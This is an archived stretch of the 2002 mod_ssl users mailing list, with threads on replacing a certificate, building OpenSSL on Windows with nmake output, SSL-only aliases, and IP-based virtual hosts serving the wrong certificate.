References: <009c01c29d26$43867ac0$07020b0a@DOMAIN>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms050401090806070207040003"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms050401090806070207040003
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Just find it on the disc and delete it.

Gilberto Garcia Jr. wrote:
> Is there any way to erase the certificate and create a new one?
>  
> thks


--------------ms050401090806070207040003
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIE4jCC
Am0wggHWAgEBMA0GCSqGSIb3DQEBBAUAMHkxCzAJBgNVBAYTAlNJMRIwEAYDVQQIEwlTbG92
ZW5pamExEDAOBgNVBAcTB01hcmlib3IxGTAXBgNVBAMTEG1lLmhvbWVsaW51eC5uZXQxKTAn
BgkqhkiG9w0BCQEWGndlYm1hc3RlckBtZS5ob21lbGludXgubmV0MB4XDTAyMTIwMzE4NTAx
MloXDTAzMTIwMzE4NTAxMlowgYQxCzAJBgNVBAYTAlNJMRIwEAYDVQQIEwlTbG92ZW5pamEx
EDAOBgNVBAcTB01hcmlib3IxDzANBgNVBAoTBlN0dXBhcjEUMBIGA1UEAxMLU2FzYSBTVFVQ
QVIxKDAmBgkqhkiG9w0BCQEWGXNhc2FAc3R1cGFyLmhvbWVsaW51eC5uZXQwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAM8nKrWm3uGn0BhPDpLX6QwRFenRkeDkYA1tgggH1pr+N1ZD
ZWDMLCTbbVYLdW9eyAsVod+F+LWNAHw4L4CNw2ZFKLDIfLUgOJB3QV97YqpB7/9lUBnJR0pD
BaGFaquBbOShSQN6/PHRiTn4fSslJYyQgX2tAmPLEXmuHx16NKtFAgMBAAEwDQYJKoZIhvcN
AQEEBQADgYEAIhPH35Dp/nfCS0sip25GJG8TQOtidBNwxkL+SY9FWnKKqbpoUqcdwZf7gfaJ
bAOmjIthJWqxhR92ajbpQNdiSf6z+2AjvbSUdLUM2J6m1Ht+FMi+hY2puxZnI26Ps1CQ2vWT
XG59XCkbfuUl6A1UsG0lJSI8YIGfvQZgw4yxjM0wggJtMIIB1gIBATANBgkqhkiG9w0BAQQF
ADB5MQswCQYDVQQGEwJTSTESMBAGA1UECBMJU2xvdmVuaWphMRAwDgYDVQQHEwdNYXJpYm9y
MRkwFwYDVQQDExBtZS5ob21lbGludXgubmV0MSkwJwYJKoZIhvcNAQkBFhp3ZWJtYXN0ZXJA
bWUuaG9tZWxpbnV4Lm5ldDAeFw0wMjEyMDMxODUwMTJaFw0wMzEyMDMxODUwMTJaMIGEMQsw
CQYDVQQGEwJTSTESMBAGA1UECBMJU2xvdmVuaWphMRAwDgYDVQQHEwdNYXJpYm9yMQ8wDQYD
VQQKEwZTdHVwYXIxFDASBgNVBAMTC1Nhc2EgU1RVUEFSMSgwJgYJKoZIhvcNAQkBFhlzYXNh
QHN0dXBhci5ob21lbGludXgubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDPJyq1
pt7hp9AYTw6S1+kMERXp0ZHg5GANbYIIB9aa/jdWQ2VgzCwk221WC3VvXsgLFaHfhfi1jQB8
OC+AjcNmRSiwyHy1IDiQd0Ffe2KqQe//ZVAZyUdKQwWhhWqrgWzkoUkDevzx0Yk5+H0rJSWM
kIF9rQJjyxF5rh8dejSrRQIDAQABMA0GCSqGSIb3DQEBBAUAA4GBACITx9+Q6f53wktLIqdu
RiRvE0DrYnQTcMZC/kmPRVpyiqm6aFKnHcGX+4H2iWwDpoyLYSVqsYUfdmo26UDXYkn+s/tg
I720lHS1DNieptR7fhTIvoWNqbsWZyNuj7NQkNr1k1xufVwpG37lJegNVLBtJSUiPGCBn70G
YMOMsYzNMYICbDCCAmgCAQEwfjB5MQswCQYDVQQGEwJTSTESMBAGA1UECBMJU2xvdmVuaWph
MRAwDgYDVQQHEwdNYXJpYm9yMRkwFwYDVQQDExBtZS5ob21lbGludXgubmV0MSkwJwYJKoZI
hvcNAQkBFhp3ZWJtYXN0ZXJAbWUuaG9tZWxpbnV4Lm5ldAIBATAJBgUrDgMCGgUAoIIBRDAY
BgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wMjEyMDYxMzIyMjha
MCMGCSqGSIb3DQEJBDEWBBTZHi4IL+AwQjV2ySMygcrsX4vqETBSBgkqhkiG9w0BCQ8xRTBD
MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN
BggqhkiG9w0DAgIBKDCBkAYLKoZIhvcNAQkQAgsxgYCgfjB5MQswCQYDVQQGEwJTSTESMBAG
A1UECBMJU2xvdmVuaWphMRAwDgYDVQQHEwdNYXJpYm9yMRkwFwYDVQQDExBtZS5ob21lbGlu
dXgubmV0MSkwJwYJKoZIhvcNAQkBFhp3ZWJtYXN0ZXJAbWUuaG9tZWxpbnV4Lm5ldAIBATAN
BgkqhkiG9w0BAQEFAASBgLD3bBOqDePbZ78LYVZHIxafXQmqrNG4UhkT9BN8I9CLRucKgyUH
MUz/EbvJ6RkT4P2D3mUzdNkjDZxXhqmVJh97kZD8D7HVZ5sVy6PKTL4KeZBo3YHw4E/BddPD
/Mo8iBkBT/I8U+7LoPJqHNqLKGnJXwENCA3RZSQZxWvy/fe3AAAAAAAA
--------------ms050401090806070207040003--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  9 13:17:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA26547; Mon, 9 Dec 2002 13:16:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id NAA26534; Mon, 9 Dec 2002 13:15:32 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 6337F4CE715; Mon,  9 Dec 2002 13:15:31 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 703742888D; Mon,  9 Dec 2002 13:14:36 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web13403.mail.yahoo.com id MAA25732; Mon, 9 Dec 2002 12:58:12 +0100 (MET)
Message-ID: <20021209115811.23136.qmail@web13403.mail.yahoo.com>
Received: from [202.155.108.100] by web13403.mail.yahoo.com via HTTP; Mon, 09 Dec 2002 11:58:11 GMT
Date: Mon, 9 Dec 2002 11:58:11 +0000 (GMT)
From: =?iso-8859-1?q?dian=20dian?= 
Subject: dian_stmik@yahoo.com
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?dian=20dian?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

please ...(10x)

i need clear instructions about : installing mod_ssl
step by step.

i've follow the readme file but i'am stuck at..
(..ms\do_ms...(about...*.mak files))..

info :
OS :win98 se
perl : activeperl 5.6.1
apache : 1.3.27
tools :visual c++ 6 
ssl-core : openssl 0.9.6h

--thank you..



__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  9 15:22:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01378; Mon, 9 Dec 2002 15:21:20 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts22-srv.bellnexxia.net id PAA01371; Mon, 9 Dec 2002 15:20:32 +0100 (MET)
Received: from localhost.localdomain ([64.231.121.188])
          by tomts22-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021209142031.RCFJ17429.tomts22-srv.bellnexxia.net@localhost.localdomain>
          for ; Mon, 9 Dec 2002 09:20:31 -0500
Subject: Re: dian_stmik@yahoo.com
From: hunter 
To: modssl-users@modssl.org
In-Reply-To: <20021209115811.23136.qmail@web13403.mail.yahoo.com>
References: <20021209115811.23136.qmail@web13403.mail.yahoo.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 09 Dec 2002 09:20:33 -0500
Message-Id: <1039443633.1616.74.camel@ptak>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 2002-12-09 at 06:58, dian dian wrote:
> please ...(10x)
> 
> i need clear instructions about : installing mod_ssl
> step by step.
> 
> i've follow the readme file but i'am stuck at..
> (..ms\do_ms...(about...*.mak files))..
> 
> info :
> OS :win98 se
> perl : activeperl 5.6.1
> apache : 1.3.27
> tools :visual c++ 6 
> ssl-core : openssl 0.9.6h
> 
> --thank you..
> 
> 
> 
> __________________________________________________
> Do You Yahoo!?
> Everything you'll ever need on one web page
> from News and Sport to Email and Music Charts
> http://uk.my.yahoo.com
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

dian,

I assume from what you have written that you are building OpenSSL at
this point.

I also assume that before you ran 'ms\do_ms' 
...you ran 'perl configure VC-WIN32'


Your output should have been similar to this...

 Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

2002.12.09  8.15.44.96
[D:\work\openssl]perl Configure VC-WIN32
Configuring for VC-WIN32
IsWindows=1
CC            =cl
CFLAG         =-DTHREADS  -DDSO_WIN32
EX_LIBS       =
BN_ASM        =bn_asm.o
DES_ENC       =des_enc.o fcrypt_b.o
BF_ENC        =bf_enc.o
CAST_ENC      =c_enc.o
RC4_ENC       =rc4_enc.o
RC5_ENC       =rc5_enc.o
MD5_OBJ_ASM   =
SHA1_OBJ_ASM  =
RMD160_OBJ_ASM=
PROCESSOR     =
RANLIB        =true
PERL          =perl
THIRTY_TWO_BIT mode
BN_LLONG mode
RC4_INDEX mode
RC4_CHUNK is undefined

Configured for VC-WIN32.

'ms\do_ms' is a batch file that calls perl to create the correct build -
if you are using the wrong perl it will fail...

Now when you run 'ms\do_ms' you should get the following output...

2002.12.09  8.17.24.65
[D:\work\openssl]

2002.12.09  8.17.24.65
[D:\work\openssl]ms\do_ms

2002.12.09  8.19.47.05
[D:\work\openssl]perl util\mkfiles.pl  1>MINFO

2002.12.09  8.19.47.22
[D:\work\openssl]rem perl util\mk1mf.pl VC-MSDOS no-sock >ms\msdos.ma

2002.12.09  8.19.47.22
[D:\work\openssl]rem perl util\mk1mf.pl VC-W31-32 >ms\w31.mak

2002.12.09  8.19.47.22
[D:\work\openssl]perl util\mk1mf.pl dll VC-W31-32  1>ms\w31dll.mak

2002.12.09  8.19.47.39
[D:\work\openssl]perl util\mk1mf.pl no-asm VC-WIN32  1>ms\nt.mak

2002.12.09  8.19.47.50
[D:\work\openssl]perl util\mk1mf.pl dll no-asm VC-WIN32  1>ms\ntdll.m

2002.12.09  8.19.47.74
[D:\work\openssl]perl util\mkdef.pl 16 libeay  1>ms\libeay16.def

2002.12.09  8.19.48.93
[D:\work\openssl]perl util\mkdef.pl 32 libeay  1>ms\libeay32.def

2002.12.09  8.19.50.18
[D:\work\openssl]perl util\mkdef.pl 16 ssleay  1>ms\ssleay16.def

2002.12.09  8.19.51.33
[D:\work\openssl]perl util\mkdef.pl 32 ssleay  1>ms\ssleay32.def

2002.12.09  8.19.52.47
[D:\work\openssl]


Following this you run 'nmake -f ms\ntdll.mak'...


The following errors are caused because I previously built the code
using MASM (I think) ... anyway I was using old source so I downloaded
new source... 

I have also experienced problems when my cygwin perl is in the path
before my other perl - I do not know for certain what my other perl is
(I think it is active perl 5 something) ... but it works and I have no
intention of breaking it by getting something else.  Having failed in
the environment you have to get a new copy of the source from the tar
ball. 


However, before I replay this with the new source ... since you want a
detailed answer ... how about if you provide I detailed question so that
I do not have to guess at what you are seeing ... when I ran through the
steps with the new source it works perfectly and the output is large...

Perhaps you could cut 'n paste the console output of your failure so
that I can see what you are doing? Or, redirect the output to a file and
send the file.


2002.12.09  8.19.52.47
[D:\work\openssl]nmake -f ms\ntdll.mak

Microsoft (R) Program Maintenance Utility   Version 6.00.8168.0
Copyright (C) Microsoft Corp 1988-1998. All rights reserved.

Building OpenSSL
        copy nul+ .\crypto\buildinf.h tmp32dll\buildinf.h
nul
.\crypto\buildinf.h
        1 file(s) copied.
        copy nul+ .\crypto\opensslconf.h inc32\openssl\opensslconf.h
nul
.\crypto\opensslconf.h
        1 file(s) copied.
        cl /Fotmp32dll\des_enc.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2 /
Ob2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /F
dout32dll /GD -D_WINDLL -D_DLL  -c .\crypto\des\des_enc.c
des_enc.c
        cl /Fotmp32dll\fcrypt_b.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2
/Ob2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /
Fdout32dll /GD -D_WINDLL -D_DLL  -c .\crypto\des\fcrypt_b.c
fcrypt_b.c
        cl /Fotmp32dll\rc4_enc.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2 /
Ob2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /F
dout32dll /GD -D_WINDLL -D_DLL  -c .\crypto\rc4\rc4_enc.c
rc4_enc.c
        cl /Fotmp32dll\rc5_enc.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2 /
Ob2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /F
dout32dll /GD -D_WINDLL -D_DLL  -c .\crypto\rc5\rc5_enc.c
rc5_enc.c
        cl /Fotmp32dll\bf_enc.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2 /O
b2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /Fd
out32dll /GD -D_WINDLL -D_DLL  -c .\crypto\bf\bf_enc.c
bf_enc.c
        cl /Fotmp32dll\c_enc.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5 /Ox
/O2 /Ob
2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /Fdo
ut32dll /GD -D_WINDLL -D_DLL  -c .\crypto\cast\c_enc.c
c_enc.c
        cl /Fotmp32dll\bn_asm.obj  -Iinc32 -Itmp32dll /MD /W3 /WX /G5
/Ox /O2 /O
b2 /Gs0 /GF /Gy
/nologo -DWIN32 -DWIN32_LEAN_AND_MEAN -DL_ENDIAN -DDSO_WIN32 /Fd
out32dll /GD -D_WINDLL -D_DLL  -c .\crypto\bn\bn_asm.c
bn_asm.c
        link /nologo /subsystem:console /machine:I386 /opt:ref /dll
/out:out32dl
l\libeay32.dll /def:ms/LIBEAY32.def @D:\Temp\nma01212.
   Creating library out32dll\libeay32.lib and object
out32dll\libeay32.exp
md5_dgst.obj : error LNK2001: unresolved external symbol
_md5_block_asm_host_ord
er
sha1dgst.obj : error LNK2001: unresolved external symbol
_sha1_block_asm_data_or
der
sha1dgst.obj : error LNK2001: unresolved external symbol
_sha1_block_asm_host_or
der
rmd_dgst.obj : error LNK2001: unresolved external symbol
_ripemd160_block_asm_ho
st_order
out32dll\libeay32.dll : fatal error LNK1120: 4 unresolved externals
NMAKE : fatal error U1077: 'link' : return code '0x460'
Stop.

2002.12.09  8.21.53.77
[D:\work\openssl]



I may have provided enough clues for you to continue on your own -- if
not then you will have to ask questions with more detail.

-hunter



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec  9 16:05:38 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA03056; Mon, 9 Dec 2002 16:04:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ms1kw.tx.shawcable.net id QAA03043; Mon, 9 Dec 2002 16:03:28 +0100 (MET)
Received: from 127.0.0.1 (localhost [127.0.0.1])
	by dummy.domain.name (Postfix) with SMTP id 2DE5735016F
	for ; Mon,  9 Dec 2002 09:01:20 -0600 (CST)
Received: by ms1kw.tx.shawcable.net (Postfix, from userid 48)
	id CEB4C350103; Mon,  9 Dec 2002 09:01:19 -0600 (CST)
From: "Ronnie Clark" 
To: modssl-users@modssl.org
Subject: SSL and Alias
X-Mailer: NeoMail 1.25
X-IPAddress: 63.89.83.220
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Message-Id: <20021209150119.CEB4C350103@ms1kw.tx.shawcable.net>
Date: Mon,  9 Dec 2002 09:01:19 -0600 (CST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ronnie Clark" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hello all!
I have a website, http://foo.com, and I wish to add an Alias section in 
my httpd.conf file so I can have http://foo.com/newsite/. Is there a 
way to have the Aliased site set to be SSL only, so that instead of 
http://foo.com/newsite/ I get https://foo.com/newsite/ ??

If this cannot be done, any suggestions?

Thanks in advance,
Ronnie Clark


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 10 08:09:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA09972; Tue, 10 Dec 2002 08:08:14 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.funkware.com id IAA09948; Tue, 10 Dec 2002 08:07:03 +0100 (MET)
Received: by mail.funkware.com (Postfix, from userid 8490)
	id 652B1D1F0; Mon,  9 Dec 2002 23:07:02 -0800 (PST)
Date: Mon, 9 Dec 2002 23:07:02 -0800
From: Alex Tang 
To: modssl-users@modssl.org
Cc: Alex Tang 
Subject: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Message-ID: <20021210070702.GC3107@funkware.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Tang 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi folks.

I've read a bunch about how you can only do virtual hosting using IPs or
Ports, not using NBVH.  No problem.

However, I'm trying to setup my server (apache 2.0.43, OpenSSL
0.9.7-beta5, RH Linux 7.3) to do IP or Port based virtual hosts.  

It seems that the server will only ever use the first cert declared.  

I have the following in my httpd.conf (well, technically a file included
by httpd.conf)

SSLSessionCache         dbm:/var/cache/mod_ssl/scache
SSLSessionCacheTimeout  300
SSLMutex  file:logs/ssl_mutex
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin


    ServerName                  A.funkware.com
    ServerAdmin                 A@funkware.com
    ErrorLog                    logs/A/error_log
    CustomLog                   logs/A/access_log combined

    SSLEngine on
    SSLCertificateFile          /usr/local/etc/A.Cert
    SSLCertificateKeyFile       /usr/local/etc/A.key

    DocumentRoot                /webdocs/A

    # other sundry virtual host directory stuff here.



    AddType                     application/x-x509-ca-cert .crt
    AddType                     application/x-pkcs7-crl    .crl


    ServerName                  B.funkware.com
    ServerAdmin                 B@funkware.com
    ErrorLog                    logs/B/error_log2
    CustomLog                   logs/B/access_log2 combined

    SSLEngine on
    SSLCertificateFile          /etc/httpd/conf/httpd-cert-3443.cert
    SSLCertificateKeyFile       /etc/httpd/conf/httpd-cert-3443.key

    DocumentRoot                "/local/private/OpenCA/httpd/htdocs/pub"

    # other sundry virtual host directory stuff here.



Like i said, when i startup the server, the first cert (A.Cert) is used
for both virtual hosts.  Does this seutp look correct?  Is there something
I missed?  

Here are a couple more tidbits of info that i've learned...I don't know if
any of it is useful though...

  * All the certs and keys are valid.  I've verified it using OpenSSL.
  * When I get the root page for  both virtual hosts, i get the proper
    page for each server.
  * If i change the second "SSLCertificateFile" to a bogus file or
    something that doesn't exist, the server will not startup (as
    expected).  However, the second cert is still not used.
  * If i change the order (putting the VirtualHost declaration for .33
    before .31), the behavior is consistant: the httpd-cert-3443.cert is
    used for both servers.

Thanks a bunch.

...alex...

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 10 09:07:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA12591; Tue, 10 Dec 2002 09:06:21 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id JAA12452; Tue, 10 Dec 2002 09:04:46 +0100 (MET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gBA84a5V008234
	for ; Tue, 10 Dec 2002 09:04:36 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gBA84ZDm014279
	for ; Tue, 10 Dec 2002 09:04:35 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Date: Tue, 10 Dec 2002 09:04:35 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F746@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Importance: normal
Thread-Index: AcKgGzT80Zp+gQKVQu+wWktMAxSyNgABbATw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

See comments..

>-----Original Message-----
>From: Alex Tang [mailto:altitudespam@funkware.com]
>Sent: Dienstag, 10. Dezember 2002 08:07
>To: modssl-users@modssl.org
>Cc: Alex Tang
>Subject: Problem with IP/Port Based (NOT Name Based) virtual hosts.
>
>
>Hi folks.
>
>I've read a bunch about how you can only do virtual hosting 
>using IPs or Ports, not using NBVH.  No problem.

You must be the first guy to figure this out from the docs! Well done
:-)

>However, I'm trying to setup my server (apache 2.0.43, OpenSSL
>0.9.7-beta5, RH Linux 7.3) to do IP or Port based virtual hosts.  
>
>It seems that the server will only ever use the first cert declared.  
>
>I have the following in my httpd.conf (well, technically a 
>file included
>by httpd.conf)
>
>SSLSessionCache         dbm:/var/cache/mod_ssl/scache
>SSLSessionCacheTimeout  300
>SSLMutex  file:logs/ssl_mutex
>SSLRandomSeed startup builtin
>SSLRandomSeed connect builtin
>
>
>    ServerName                  A.funkware.com
>    ServerAdmin                 A@funkware.com
>    ErrorLog                    logs/A/error_log
>    CustomLog                   logs/A/access_log combined
>
>    SSLEngine on
>    SSLCertificateFile          /usr/local/etc/A.Cert
>    SSLCertificateKeyFile       /usr/local/etc/A.key
>
>    DocumentRoot                /webdocs/A
>
>    # other sundry virtual host directory stuff here.
>

Looks OK...

>
>
>    AddType                     application/x-x509-ca-cert .crt
>    AddType                     application/x-pkcs7-crl    .crl
>
>
>    ServerName                  B.funkware.com
>    ServerAdmin                 B@funkware.com
>    ErrorLog                    logs/B/error_log2
>    CustomLog                   logs/B/access_log2 combined
>
>    SSLEngine on
>    SSLCertificateFile          /etc/httpd/conf/httpd-cert-3443.cert
>    SSLCertificateKeyFile       /etc/httpd/conf/httpd-cert-3443.key
>
>    DocumentRoot                
>"/local/private/OpenCA/httpd/htdocs/pub"
>
>    # other sundry virtual host directory stuff here.
>
>

Looks OK too...

>
>Like i said, when i startup the server, the first cert (A.Cert) is used
>for both virtual hosts.  Does this seutp look correct?  Is 
>there something
>I missed?  
>
>Here are a couple more tidbits of info that i've learned...I 
>don't know if
>any of it is useful though...
>
>  * All the certs and keys are valid.  I've verified it using OpenSSL.
>  * When I get the root page for  both virtual hosts, i get the proper
>    page for each server.

What exactly do you mean here... Do you mean that:

https://A.funkware.com/ -> /webdocs/A
https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub

or do you mean via HTTP?

>  * If i change the second "SSLCertificateFile" to a bogus file or
>    something that doesn't exist, the server will not startup (as
>    expected).  However, the second cert is still not used.

As you say, this is normal - missing files or directories cause apache
to abort during startup, long before any network setup is done.

>  * If i change the order (putting the VirtualHost declaration for .33
>    before .31), the behavior is consistant: the 
>httpd-cert-3443.cert is
>    used for both servers.

I suspect a DNS or routing problem... I notice you have real ".com"
domain names which implies these sites are available on the internet.
However, the IP addresses are on the 192.168.0.0 private network. This
implies that you have a firewall and/or router with network address
translation between the webserver and the web. Are you sure that, after
NAT, A.funkware.com resolves to 192.168.7.31 and that B.funkware.com
resolves to 192.168.7.33?

I suspect that both FQDNs are resolving to the same internal IP
address... 

Rgds,

Owen Boyle
>
>Thanks a bunch.
>
>...alex...
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 10 09:58:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA15208; Tue, 10 Dec 2002 09:57:32 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.funkware.com id JAA15182; Tue, 10 Dec 2002 09:57:02 +0100 (MET)
Received: by mail.funkware.com (Postfix, from userid 8490)
	id ED031D1F0; Tue, 10 Dec 2002 00:56:59 -0800 (PST)
Date: Tue, 10 Dec 2002 00:56:59 -0800
From: Alex Tang 
To: modssl-users@modssl.org
Cc: altitudespam@funkware.com
Subject: Re: Problem with IP/Port Based (NOT Name Based) virtual hosts.
Message-ID: <20021210085659.GA3265@funkware.com>
References: <484A6CA492BE654395D208B1D8D5393972F746@SOMEXEVS001.ex.ordersx.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <484A6CA492BE654395D208B1D8D5393972F746@SOMEXEVS001.ex.ordersx.org>
User-Agent: Mutt/1.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Tang 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there.  Thanks for the help.  I have some followup comments inline...


On Tue, Dec 10, 2002 at 09:04:35AM +0100, Boyle Owen wrote:
> You must be the first guy to figure this out from the docs! Well done
> :-)

Ha.  Thanks. :)

> >However, I'm trying to setup my server (apache 2.0.43, OpenSSL
> >0.9.7-beta5, RH Linux 7.3) to do IP or Port based virtual hosts.  
> >
> >It seems that the server will only ever use the first cert declared.  
> >
> >I have the following in my httpd.conf (well, technically a 
> >file included by httpd.conf)
> >
> >SSLSessionCache         dbm:/var/cache/mod_ssl/scache
> >SSLSessionCacheTimeout  300
> >SSLMutex  file:logs/ssl_mutex
> >SSLRandomSeed startup builtin
> >SSLRandomSeed connect builtin
> >
> >
> >    ServerName                  A.funkware.com
> >    ServerAdmin                 A@funkware.com
> >    ErrorLog                    logs/A/error_log
> >    CustomLog                   logs/A/access_log combined
> >
> >    SSLEngine on
> >    SSLCertificateFile          /usr/local/etc/A.Cert
